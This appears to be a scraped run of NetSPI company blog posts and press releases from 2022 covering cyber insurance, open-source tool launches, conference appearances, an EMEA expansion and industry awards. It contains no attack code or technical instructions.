Team NetSPI

More by Team NetSPI
The Current State of Cyber Insurance
Published: 2022-08-09
It’s no secret that data breaches are costly. IBM’s annual Cost of a Data Breach report illustrates this well:  

  • The average cost of a data breach in 2021 was $4.35 million. 
  • The average cost of a ransomware attack, not including the cost of the ransom, was $4.54 million in 2021.
  • 60 percent of organizations’ breaches led to increases in prices passed on to customers. 

Given the significant costs associated with data breaches, organizations are increasingly looking to cyber insurance to help protect their businesses against financial losses from a cyber attack. In fact, in IBM’s report, “insurance protection” was a key factor that lowered the average total cost of a data breach.  

Yet, cybersecurity insurance is still considered an emerging space, one that is notoriously difficult to navigate. 

For insights on the topic, we recently sat down with industry experts Ethan Harrington, Founder and Principal at 221b Consulting, and Mary Roop, Consultant at 221b Consulting, to discuss the current state of cyber insurance and get answers to some of our burning questions. Continue reading for highlights from the discussion.

What’s going on in the cyber insurance market? 

Ethan Harrington: The market is terrible, and many of the issues we've started to experience have surfaced just within the last few years. Last year was a historical year, and not for good reason. We saw a 300-plus percent increase in ransomware. We also saw our clients experience triple-digit increases in their cyber insurance premiums. 

On average, a company categorized as having "good" risk levels may see a 15 to 20 percent increase in premiums, and those at the "questionable" risk level or that have had claims experience may see another three-digit percentage increase. 

Why is this happening? Market corrections. The insurance marketplace is global, and all of these insurers are writing more than cyber coverage. When they have a year where auto liability coverage is bad, they're typically going to try to make up some of that premium in other places because they have to make money. In 2019 and during COVID-19, auto liability and general liability were extremely stressed, along with other claims completely unrelated to cyber. So, we knew that there was going to be a potential correction. 

But what we saw last year was a complete market shift. We’ve never seen anything like this before. We’re concerned that what we’re seeing right now is going to perpetuate for many more years and are unsure if coverages are ever going to return to what they were and how the associated premium will be impacted.  

As cyber insurance matures, is it becoming yet another regulation or standard to comply with? 

Ethan: Yes and no. Yes, because it is another party that is keenly interested in what organizations are doing to not only harden their defenses and protect their financials but also protect Personally Identifiable Information (PII) or data from a potential ransomware attack that could cause business interruption. 

No, because most insurance carriers understand that there are several golden standards to adhere to, whether it's the National Institute of Standards and Technology (NIST) or the International Organization for Standardization (ISO). If you can document that you follow one or a combination of them, then I think that most would understand it. 

Insurers are starting to layer on more requirements beyond what NIST or ISO would indicate as guidance – and they’re asking questions specific to CISOs. They're starting to ask questions about cyber resiliency. In general, most regulatory frameworks that organizations follow focus on preventative actions. Now, carriers are focusing on reactive responses to cyber attacks, looking at what you are doing to limit the potential impact if you do have to file a claim. 

There’s more scrutiny involved in cyber insurance today, and it's different from what other regulators require.  

Who typically manages the cyber insurance process? 

Here is how the webinar attendees, many of whom came from financial institutions, said cyber insurance is managed at their respective organizations: 

  • 42% risk management  
  • 25% finance 
  • 25% information security  
  • 8% general counsel/legal 

Mary Roop: Whoever runs risk management typically controls the placement, but it truly is a partnership between the person responsible for placing the insurance policies, the information security team, the privacy team within legal, and the team responsible for Payment Card Insurance (PCI) compliance.  

These teams need to work together to ensure an understanding of the cyber hygiene and the data incident response within your organization. This creates a holistic picture with complete information useful in the robust cyber insurance application and underwriting process. 

How has ransomware played a role in the cyber insurance market?  

Ethan: Ransomware decimated the entire insurance industry from a cyber perspective. In 2021, there was a 300-plus percent increase in ransomware attacks. Ransomware used to be a quick way for adversaries to grab cash, but they've become more intelligent, conducting background checks into businesses to determine what their financials look like to identify the most realistic ransom amount to ask for. 

Ransomware is not going away anytime soon, and the cyber insurance market is responding to that. Now, we are starting to see sub-limits within insurance policies specific to ransomware, separate retentions as it applies to ransomware, and different changes in waiting periods (eight hours then vs. 24-48 hours now). But I expect that'll start to lessen, and some of those policies will return to what they were before. 

Want to improve your ransomware prevention and detection? Explore NetSPI’s ransomware attack simulation services. 

How have cybersecurity insurance questionnaires evolved? 

Ethan: 15 years ago, none of the insurers had any expertise in cybersecurity. Many insurance companies recognized that they do not understand cybersecurity and hired third parties to come in and ask the questions on their behalf.  

That has changed. Lots of insurance carriers are now hiring specific technical people who have been consultants in cyberspace or those who managed security service providers because they understand the market much better. Now, insurance companies are teaching them insurance and how to do underwriting versus outsourcing. 

How do you navigate situations where providers require specific vendors for your solutions and controls? 

Mary: If your cyber insurance carrier isn't already requesting this within the application, we do recommend getting pre-approval on your data incident providers. They may be included on that pre-approved list already, and if not, they're going to have to be vetted extensively by those providers.  

This process is lengthy, but it is important to undertake before starting your renewal strategy. Go meet up with your legal team to determine the outside counsel that you can use to help advocate for your vendor choices. Carriers want to understand vendor credibility if they're not familiar with them. 

Getting ahead of this process is important because you don't want any surprises when a data incident occurs. Like when your carrier says, "We're not going to approve this claim because you do not use an approved vendor." If you are proactive about this, you can go to the leaders of the respective departments and come up with a solution before it's too late. 

There has been talk about possibly monitoring clients’ cyber behavior and adjusting insurance premiums accordingly. How might we see a program like this play out? 

Ethan: We don’t like insurance companies constantly monitoring and doing scans of environments. It looks bad for the insurance industry because we all know that there are going to be weaknesses that can be found if you look close enough.  

If an insurance company is constantly scanning your system, it is possible that they're going to come back to you and say, “We need you to fix this.” At some point, the CISO is going to say, “I don't have any more risk management practices that I can apply to protect us against that.” Security teams can do everything they can, but if employees/personnel make a negligent mistake or are heavily targeted, they can cause a massive claim to occur. 

We’re putting the CISO in a difficult position where they’re trying to manage the board, protect their critical assets, and now all of a sudden, they also need to keep an insurance company happy.  

Some scans delve into the depths of systems to find vendors and clients that you've referenced and how they could affect your insurance. Underwriters, especially in financial services, are looking at the kind of brand reputation or loss of business income that might be impacted if there was a data security incident. It's becoming exceedingly difficult for underwriters to try to figure this out. 

Have you seen any companies go under because they've failed to secure cyber insurance due to poor IT security controls? 

Ethan: Thus far, no, I have not seen anybody that has actually gone under because they didn't buy cyber insurance. But I anticipate it is going to happen, especially with the triple-digit increases in premiums. 

We are seeing more and more companies that are not buying or cannot obtain cyber insurance, and it will come back to bite them in some capacity. It's likely that we will see organizations going under as a result of the rising financial costs associated with breaches today. 

For the full conversation and more in-depth insights from Ethan, Mary, and Norman, watch the on-demand webinar.


NetSPI Releases Two Open-Source Tools for the Information Security Community
Published: 2022-08-09
The tools help defense teams discover vulnerable network shares and identify adversary behaviors.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.

These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections. 

  • PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain-joined computers. This capability helps address the risk of excessive share permissions in Active Directory environments, which can lead to data exposure, privilege escalation, and ransomware attacks. 
  • PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis. It can also output easy-to-consume .csv files so that additional triage and analysis can be done using other tools and processes. 

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.” 

To see PowerHuntShares in action and explore the risks of excessive share permissions, read Scott’s blog, or register for our upcoming webinar, How to Evaluate Active Directory SMB Shares at Scale. For those attending Black Hat on August 10-11, request a meeting with Scott at NetSPI booth #1687. 

NetSPI’s global penetration testing team has developed several open-source tools, including the popular penetration testing tools PowerUpSQL and MicroBurst. Learn more about NetSPI’s commitment to open-source tool development on the company’s tool repository.

About NetSPI  

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over one million assets to find four million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.  

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Inkhouse for NetSPI 
netspi@inkhouse.com
(774) 451-5142 


NetSPI Recognized in the 2022 Gartner® Hype Cycle for Security Operations
Published: 2022-08-04

Minneapolis, Minnesota – NetSPI, a market leader in penetration testing and attack surface management, has today been named a Sample Vendor for Pentesting as a Service (PTaaS) in the 2022 Gartner® Hype Cycle for Security Operations (SecOps).

This Gartner Hype Cycle for SecOps includes entries across the SecOps space that “aim to help security and risk management leaders strategize and deliver effective response and remediation.”  

We believe our inclusion in this year’s report validates NetSPI’s PTaaS model.

The core benefits of NetSPI's Resolve™ platform fall into three areas: 

  • Hybrid automated and manual testing approach: NetSPI leverages a combination of automation and human pentesters to increase the efficiency and effectiveness of the results. With automation, NetSPI alleviates many of the mundane vulnerability management tasks for organizations—enabling more manual pentesting to find and fix business-critical vulnerabilities. 
  • Real-time validation and faster remediation: NetSPI’s PTaaS model delivers a platform that enables faster scheduling and execution, and real-time communications with testers and visibility of test results. By providing access to real-time findings, NetSPI enables earlier remediation of vulnerabilities. 
  • Support for teams with limited in-house security experts: NetSPI provides customized and tailored guidance throughout the life cycle of each assessment to support internal teams facing the pressures of the security skill gap.  

“To us, this acknowledgment by Gartner further cements our approach to delivering innovative vulnerability and risk management solutions to today’s top enterprises,” said Travis Hoyt, CTO at NetSPI. “Traditional penetration testing is dead. PTaaS allows organizations to remediate faster, receive support from expert pentesters, and implement a strategic approach to offensive security.” 

According to Gartner, “the adoption of remote work, and increased use of mobile devices and cloud services have not slowed over the last 12 months. This has led to expanded requirements for organizations to track risk and threats to a wider set of digital assets. With the expansion of digital business functions and third-party-managed assets, security and risk management leaders must reevaluate how their business-critical environments change security strategy and tooling.” The report also mentions that “pentesting is foundational in a security program and mandated by various compliance standards. PTaaS enables organizations to elevate their security posture through continual assessment, and integrates validation earlier in the AppDev cycle by giving access to real-time findings delivered through the platform, therefore enabling faster treatment of vulnerabilities.” 

Learn more about NetSPI’s PTaaS solutions here.

Gartner, Hype Cycle for Security Operations, 2022, Andrew Davies, 5 July, 2022.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. GARTNER and HYPE CYCLE are the registered trademarks of Gartner Inc., and/or its affiliates in the U.S and/or internationally and have been used herein with permission. All rights reserved.

About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn. 

Media Contacts:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Inkhouse for NetSPI
netspi@inkhouse.com


Media Alert: NetSPI at Black Hat 2022 and DEF CON 30
Published: 2022-08-03
Penetration Testing as a Service (PTaaS) leader marks its presence with various speaking sessions, open source tool releases, and a happy hour event during this year’s Black Hat and DEF CON conferences.

Minneapolis, MN and Las Vegas – NetSPI, the leader in enterprise security testing and attack surface management, will be participating in several speaking sessions and activities during Black Hat 2022 and DEF CON, taking place at the Mandalay Bay Expo Hall in Las Vegas starting on August 30. NetSPI is located at Booth #1687 on the Mandalay Bay Trade Floor. 

With over 20 years of experience, NetSPI’s team of over 200 global pentesters is highly skilled in manual pentesting and laser-focused on excellence. During the events, these company experts will inform attendees on the vulnerabilities and escalating threats targeting enterprises, as well as share insights on how businesses can mature their security programs and empower their workforces.  

NetSPI speaking sessions during Black Hat and DEF CON include: 

  • On August 10 at 10:20am PT, Nick Landers, Director of Research at NetSPI, will present at Black Hat alongside James Forshaw, Security Researcher at Google Project Zero, in a talk titled: “Elevating Kerberos to the Next Level.” In this talk, Nick and James will conduct a deep dive into the inner workings of Kerberos as it applies to local authentication and some of the unusual behaviors to be found within. They will also describe the Kerberos security issues they’ve discovered, including authentication bypasses, sandbox escapes and arbitrary code execution in privileged processes.
  • On August 12 at 10:10am PT, Karl Fosaaen, Senior Director at NetSPI, will present at the DEF CON Cloud Village in a talk titled: “Automating Insecurity in Azure.” In this talk, Karl will go over how Automation Accounts function within Azure, how attackers can abuse built-in functionality to gain access to credentials, privileged identities, and sensitive information, and present a deep dive on four vulnerabilities from the last year that all apply to Azure Automation Accounts.
  • On August 12 and 13, Melissa Miller, Managing Security Consultant at NetSPI, will present at the DEF CON Girls Hack Village.
    • On August 12 at 5pm PT, in her talk “Imposter Syndrome: The Silent Killer of Motivation,” Melissa will discuss the characteristics of a healthy work environment and steps towards updating your environment to make it right for you, along with how to realistically identify your strengths and weaknesses and use that information to pursue and achieve your career goals.
    • On August 13 at 1:30pm PT at the Hacking Diversity panel, Melissa will discuss how the industry can increase diversity in cybersecurity. 

During Black Hat, Scott Sutherland, Senior Director at NetSPI, will be revealing two new open source tools for security operations centers. The new tools are designed to help teams hunt for artifacts and anomalies associated with common “known bad” behaviors, and help teams inventory, naturally group, and prioritize the triage/remediation of excessive privileges assigned to SMB shares hosted across Active Directory computers. 

For more information or to book a meeting with one of NetSPI’s experts at Black Hat or DEF CON, please click here.

You can also join NetSPI for their Black Hat happy hour co-hosted by Adaptive Shield and Armis on August 10 at 5 PM PT at the Foundation Room Las Vegas, located on the 63rd floor of Mandalay Bay. Register your spot today.

About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contact:
Inkhouse for NetSPI
netspi@inkhouse.com


Published: 2022-06-21
Security industry leaders join NetSPI’s EMEA team to fuel growth and meet increased demand for pentesting services in EMEA.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the expansion of its global footprint in Europe, the Middle East, and Africa (EMEA) to meet growing international demand for its offensive security solutions.

“NetSPI’s technology-powered services and customer-first focus have solidified the company’s leading position within the North American offensive security industry,” said KKR’s Paul Harragan, a London-based investor in NetSPI. “The team’s specialised skill set, tech acumen and white glove delivery model will resonate with the European market and should drive continued growth and expansion as the team develops and delivers critical offensive security solutions.”

“We’ve experienced a record volume of demand from EMEA organisations needing to improve their security posture through a proven, holistic approach to pentesting, and now, we’re well positioned to deliver this in the region,” said Aaron Shilts, CEO, NetSPI. “We’ve hired a team of extremely talented, energising security leaders who align with our customer-first approach to business. Establishing our EMEA beachhead with this incredible group will ensure NetSPI is destined for accelerated growth and continued success in the region.” 

The company has appointed security industry veterans Steve Bakewell, Steve Armstrong, and Eric Graves to strategically lead NetSPI’s EMEA team and drive further growth in the region. Bakewell joins NetSPI as Managing Director of EMEA and brings over 23 years of experience in cybersecurity and risk management across organisations including Central Government & Defence and Royal Bank of Scotland, as well as with security vendors such as CipherCloud, RiskIQ and Citrix. 

“The pentesting space is highly competitive in the UK, but vendors in the region simply do not have the pedigree that NetSPI has,” Bakewell said. “NetSPI already provides its penetration testing services to nine out of the top 10 U.S. banks and many of the Fortune 500 – I’m looking forward to the opportunity to serve end users in EMEA during a time when security is high on the business agenda.” 

Bakewell will work closely with Armstrong, who has been appointed Regional Vice President for EMEA. Armstrong has two decades of experience in sales and security, spanning companies including Bitglass, CyCognito and Avira. Graves will work alongside Armstrong as NetSPI’s Regional Sales Director for EMEA, leveraging his extensive experience in cybersecurity sales for organisations such as Pentera, TrendMicro and Spok, to meet global demand and provide NetSPI’s award-winning pentesting solutions to EMEA customers. The three leaders will work closely alongside Shilts and oversee NetSPI’s growing team in EMEA. 

NetSPI will be at InfoSecurity Europe from June 21-23, 2022 at ExCeL London. Participate in a live demo and meet the company’s security experts at Stand M-12. For more information or to schedule a meeting with NetSPI at InfoSecurity Europe, please click here.


About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277 

Jessica Bettencourt, Inkhouse for NetSPI  
netspi@inkhouse.com
(774) 451-5142

Title: NetSPI Expands Global Footprint with Strategic Leadership Appointments in EMEA
Excerpt: Read about NetSPI’s expansion into the EMEA region to meet increased demand for strategic penetration testing services.
URL: https://www.netspi.com/?p=27963 (slug: netspi-emea-expansion), last modified 2022-06-17 16:43:03

Next post (ID 27956), published 2022-06-17 15:01:02:
The company is recognized for its innovation, culture, and leadership by The Star Tribune and the Top Workplaces Program.

Minneapolis, MN – NetSPI, the leader in penetration testing and attack surface management, recently won two Top Workplaces awards – Top 200 Workplaces in Minnesota and the Cultural Excellence Awards – recognizing the company’s forward-looking innovation, team-first culture, and dedicated leadership team.

Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions, measuring engagement, organizational health, and satisfaction, and the Cultural Excellence Awards highlight the company’s advancement in three key areas: 

  • Innovation: Celebrates organizations that have embedded innovation into their culture and create an environment where new ideas come from all employees.
  • Purpose & Values: Celebrates organizations that have embedded their mission and values into their culture and work efficiently to bring them into reality.
  • Leadership: Celebrates organizations whose leaders inspire confidence in their employees and in the direction of the company.

“We prioritize fostering an environment that ensures every team member feels valued, heard, and supported,” said Heather Crosley, Director of People Operations at NetSPI. “These two recognitions prove that our dedication to our culture is resonating across our workforce, and I want to thank our team for making NetSPI a great place to work.” 

These recognitions come during a year of rapid growth and innovation for NetSPI, as the company brought on more than 90 new employees this year already. NetSPI’s strong recruiting and retention initiatives and flexible company culture drive the development of new mission-critical services, with the company recently announcing the launch of its new attack surface management service, as well as enhancements to its breach & attack simulation offering. NetSPI is also expanding its global presence, building on its current momentum to serve the EMEA region.  

“Retaining top talent is more important than ever in today’s evolving cybersecurity threat environment,” said Aaron Shilts, CEO of NetSPI. “Our workforce consistently exceeds expectations, and our team-first culture is a driving force of that success. We are honored to be recognized by the Star Tribune and Top Workplaces.” 

The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from employees at Minnesota public, private, and nonprofit organizations. Earlier this year, NetSPI was recognized as a 2022 National Top Workplace.

NetSPI is hiring. Visit www.netspi.com/careers to view open roles and apply.


About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277 

Inkhouse for NetSPI 
netspi@inkhouse.com

Title: NetSPI Named a Top Minnesota Workplace and Honored for its Cultural Excellence
Excerpt: Learn what makes NetSPI a Top Workplace in Minnesota and a leader in cultural excellence.
URL: https://www.netspi.com/?p=27956 (slug: top-200-minnesota-workplaces), last modified 2022-06-17 15:52:07

Next post (ID 27877), published 2022-06-07 08:00:00:

The RSA Conference is one of the largest cybersecurity events in the world, offering a multitude of opportunities for members of the cybersecurity community to gain valuable insights and network with one another. And this week, the NetSPI team packed their bags and flew out to San Francisco for the conference after a two-year hiatus. 

Not only is this a big week for the cybersecurity industry, but also for team NetSPI as we take home the Global InfoSec Award for “Most Innovative in Penetration Testing.” Prior to their arrival at RSA, we asked our team to answer a few questions: 

  1. What are you looking forward to most during the 2022 RSA Conference?
  2. What does NetSPI’s recognition as “Most Innovative in Penetration Testing” mean to you and what do you think makes NetSPI the most innovative pentesting company? 

Continue reading for responses from our product, services, and sales leadership – all of whom were clearly excited to see many of our clients and customers in person.

What are you looking forward to most during the 2022 RSA Conference?  

Cody Chamberlain, Head of Product  

“The security community isn’t very large and bringing everyone together is extremely valuable. This is an opportunity for connecting, sharing stories, and further building relationships across companies. 

Talking with clients and prospects about the NetSPI story is the most exciting thing for me. We are in a unique position in the market with our combination of industry-leading talent and technology and I’m excited to share that with people at the conference, especially those unaware of us.” 

Charles Horton, Chief Operating Officer 

“The RSA Conference has always had an impressive lineup of speakers and sessions. Having a hiatus like many conferences have had, I think there will be a tremendous amount of energy coming into the conference as people are eager to collaborate in person with clients, colleagues, and vendors. As the landscape continues to move and shift, and clients go through different investment levels and cycles of their security programs, it is an opportune time to evaluate who and where they are investing their dollars given the number of sponsor organizations at the event.”

Chad Peterson, Managing Director  

“I am most excited about getting the opportunity to speak with our clients and industry face-to-face again. Any time we have the chance to interact in person, it always seems to foster great conversations and thought leadership. 

Having a group of experts throughout the industry under one roof again allows us to exchange ideas on how to better the security community and holistically help our shared client base.” 

Robert Richardson, VP of Enterprise Sales 

“The opportunity to connect face-to-face and spend time with our clients and meet new people is what I’m most excited about. It’s been too long. I’m really glad the turnout is exponentially larger than 2020.” 

Alex Jones, Chief Revenue Officer  

“I’m absolutely most excited about seeing all of our amazing customers. It has been such a long time since our last in-person RSA conference and the event presents such a great opportunity to connect with a high volume of people in such a short time. A huge plus is that we get to enjoy seeing our customers while also doing a lot of events with our NetSPI team. 

From a presentation perspective, I am most intrigued about Bruce Schneier’s keynote, ‘What Matters Most.’ There is so much change occurring at such a rapid pace within our industry that we need to challenge conventional thinking and start trying to solve problems in a different way.” 

Nabil Hannan, Managing Director 

“With the RSA conference being an in-person event this year, I’m most excited to re-connect with people in the industry in person. After two plus years of the pandemic, it’ll be really nice to re-connect with colleagues and catch up in person and learn from them about their current areas of focus, challenges, and the industry trends that they’re observing.” 

What does NetSPI’s recognition as most innovative in pentesting mean to you and what do you think makes NetSPI the most innovative pentesting company? 

Cody Chamberlain, Head of Product  

“It means we’re getting third-party validation of what we already know – that we have the best talent in the industry and the investments we’ve made into our technology are meeting the market’s need of high-touch customer service. As a result, we’re able to identify more vulnerabilities of a higher severity for our clients. 

Our people make NetSPI the most innovative pentesting company. As the person who works every day building and executing a technology roadmap, that might sound counterintuitive, but I see my job as finding the best ways to scale and maximize the effectiveness of our humans. At the end of the day, humans are the key to our success!”

Charles Horton, Chief Operating Officer 

“The award is certainly flattering and is really a reflection of the purpose we have as an organization along with our passion and pursuit of excellence. NetSPI has achieved this recognition due to our unwavering commitment to our clients and our team members. Our mission is to combine elite talent and technology to provide a differentiated experience and outcome for our clients, and we take pride in that recognition. This award is based on our work and reputation for things already done, and we will continue to build on this as we go forward.” 

Chad Peterson, Managing Director  

“Winning this awareness is a testament to all the hard work and dedication our teams have put in. From the consultants, technicians, sales, and strategy teams to marketing and leadership – everyone has had their hand in making NetSPI what we are, and it shows in the work that we are being honored for. 

We have some of the most talented penetration testing experts in the industry. Without these people to shape the technology that we leverage – Resolve, AttackSim, and the Attack Surface Management platform – to streamline our work and allow our pentesting consultants to spend their valuable time identifying, verifying, and providing guidance on how to address findings for our clients, we would not be the company that we are today.”

Robert Richardson, VP of Enterprise Sales 

“The secret is out. We’ve been delivering game changing quality and consistency for years, so it’s really exciting to see our growth and brand be recognized. 

It’s a combination of our technology, people, and culture – the combination of those things creates consistency and quality in the depth of our services.” 

Alex Jones, Chief Revenue Officer  

“It is tough to truly articulate how much this award means to me. For me, this is the culmination of four years of incredibly hard work, so to see how far we have come as a company but then also be publicly recognized for it is such a testament to what we have accomplished thus far. Frankly, I feel like we are just getting started! I am such a small part in this puzzle, as my four years of hard work pale in comparison to the 10+ years of hard work so many of our technical and thought leaders have put in to build our incredible reputation. 

What makes NetSPI the most innovative in pentesting is our unique combination of industry-leading technical talent, sophisticated use of bleeding edge technology, unrelenting focus on customer experience, and a culture that promotes and rewards the highest levels of moral and ethical standards.” 

Nabil Hannan, Managing Director 

“It’s a true feeling of pride knowing that I am part of an organization that is being recognized for excellence in our space. This award is a great validation of the work we have been doing as a company and that we are truly having an impact on the world of penetration testing.” 

Connect With NetSPI at the 2022 RSA Conference 

It’s clear that the team cannot wait to see many new and familiar faces this week at the conference and discuss how we have seen the industry “transform” over the past two years, and where it’s headed next.  

Book a meeting with us to discuss penetration testing in-depth or explore our other services.

Title: 2022 RSA Conference: What Makes Us the Most Innovative Pentesting Company?
Excerpt: Learn what our team is looking forward to most at the 2022 RSA Conference and what being awarded the most innovative penetration testing company means to them.
URL: https://www.netspi.com/?p=27877 (slug: rsac-2022-penetration-testing-award), last modified 2022-06-10 10:25:57

Next post (ID 27870), published 2022-06-06 12:00:00:
NetSPI honored in the coveted 10th Annual Global InfoSec Awards at the 2022 RSA Conference.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, was awarded "Most Innovative in Penetration Testing" from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine.

NetSPI represents the key criteria that CDM and the Global InfoSec Award judges look for in cybersecurity winners: understanding tomorrow’s threats, today, and innovating in unexpected ways that can help mitigate cyber risk and get one step ahead of the next breach.  

Traditional pentesting has not kept pace with the realities of business agility and cybercriminal sophistication. NetSPI has revolutionized the Penetration Testing as a Service (PTaaS) delivery model to enable organizations to view penetration testing results in real time, scale to support innovation, orchestrate faster remediation, perform always-on continuous pentesting, and more. 

NetSPI’s Resolve penetration testing platform, backed by its global team of expert pentesters, helps clients improve vulnerability management and remediation processes, better understand and reduce risk, manage the evolving attack surface, and leverage automation to enable manual pentesting to find business critical vulnerabilities that tools alone cannot uncover.

NetSPI continuously develops new solutions to meet evolving threats – most recently launching attack surface management and announcing enhancements to its breach & attack simulation services.

“We’re thrilled to be honored by Cyber Defense Magazine,” said Aaron Shilts, President and CEO of NetSPI. “Our technology-powered services are disrupting the penetration testing industry, and this recognition is a true testament to our global team’s unwavering dedication to delivering world-class penetration testing services.” 

Global Infosec Awards Winner – Cyber Defense Magazine 2022

“NetSPI embodies what we look for in leading innovators within the cybersecurity industry,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine. “NetSPI’s platform driven, human delivered approach to offensive cybersecurity provides a unique opportunity for organizations to think strategically about their proactive security efforts, instead of viewing penetration testing as a check-the-box activity.” 

For more information on NetSPI, visit the company website or speak with the company’s penetration testing experts at booth #4605 at RSA Conference 2022. Learn more about this year’s Global InfoSec Award winners in this full list here.


About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

About CDM InfoSec Awards 

This is Cyber Defense Magazine’s tenth year of honoring InfoSec innovators from around the globe. Our submission requirements are for any startup, early stage, later stage, or public companies in the INFORMATION SECURITY (INFOSEC) space that believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com.

About Cyber Defense Magazine 

Cyber Defense Magazine is the premier source of cyber security news and information for InfoSec professionals in business and government. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and special editions exclusively for the RSA Conferences. CDM is a proud member of the Cyber Defense Media Group. Learn more about us at https://www.cyberdefensemagazine.com and visit https://www.cyberdefensetv.com and https://www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives. Join a webinar at https://www.cyberdefensewebinars.com and realize that infosec knowledge is power.

NetSPI Media Inquiries
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com
(978) 201-2510 

CDM Media Inquiries

Contact: Irene Noser, Marketing Executive
Email: marketing@cyberdefensemagazine.com
Toll Free (USA): 1-833-844-9468
International: 1-646-586-9545
Website: www.cyberdefensemagazine.com 

Title: NetSPI Named "Most Innovative in Penetration Testing" in the Global InfoSec Awards
Excerpt: Read why NetSPI was selected as the most innovative pentesting company in the 2022 Global InfoSec Awards.
URL: https://www.netspi.com/?p=27870 (slug: most-innovative-pentesting-company-global-infosec-awards), last modified 2022-06-06 10:07:28

Next post (ID 27843), published 2022-06-01 08:00:00:
Organizations leverage the platform-driven, human-delivered service to measure and continuously improve the efficacy of detective controls and MSSP coverage.

